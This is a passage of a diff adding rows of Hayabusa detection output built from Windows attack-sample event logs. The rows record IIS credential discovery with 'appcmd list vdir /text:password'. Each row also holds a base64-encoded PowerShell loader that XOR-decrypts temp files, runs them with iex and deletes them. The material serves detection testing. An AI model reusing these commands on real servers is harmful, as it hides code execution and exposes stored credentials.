wAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 